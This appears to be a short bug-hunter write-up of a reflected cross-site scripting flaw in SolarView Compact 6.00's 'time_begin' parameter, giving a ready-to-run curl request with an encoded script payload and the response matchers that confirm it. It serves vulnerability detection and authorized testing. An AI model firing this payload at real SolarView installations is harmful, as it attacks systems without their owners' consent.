Bug Name:  SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting

Severity:   medium 

Priority:  P3

Risk Level:  MEDIUM - 6/10

Description:

SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.

Exploit Commands

Bash 

  curl -i -s -k -X 'GET' \
  'https://example.com/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'

⚠️ Warning: These commands are for authorized security testing only. Unauthorized access is illegal.

Expected Matchers

  • <script>alert(document.domain)</script><>
  • /Solar_History.php METHOD=post>
  • text/html

Status codes to expect: 200

Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!